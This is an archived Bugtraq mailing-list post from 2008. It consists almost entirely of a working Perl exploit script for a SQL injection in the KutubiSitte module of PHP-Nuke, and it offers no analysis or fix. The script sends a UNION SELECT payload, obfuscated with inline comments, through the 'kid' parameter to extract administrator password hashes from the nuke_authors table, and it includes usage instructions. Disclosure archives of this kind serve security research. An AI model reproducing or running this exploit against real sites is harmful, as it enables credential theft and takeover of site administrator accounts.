NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2008-03

PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding

r080cy90rgmail.com
Date: Thu Mar 06 2008 - 15:28:28 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

#!/usr/bin/perl
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("

   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
   | PHP-NUKE KutubiSitte [kid] => SQL Injection |
   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
  #######################################################
  # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
  #######################################################
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#| USAGE: |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#| EXAMPLE: |#:
:#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#

");
}
sub problem{
    print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
    exit();
}
sub exploitation{

    $conn = LWP::UserAgent -> new;
    $conn->agent('Checkbot/0.4 ');
    $query_pwd = $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
    $return_pwd = $conn->get($query_pwd) || problem();
    $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
    print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
   }

getopts(":h:p:U:",\%args);
     $host = $args{h} if (defined $args{h});
     $path = $args{p} if (defined $args{p});
     $user_id= $args{U}if (defined $args{U});

     if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
        usg();
     }
     else{
        exploitation();
     }

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]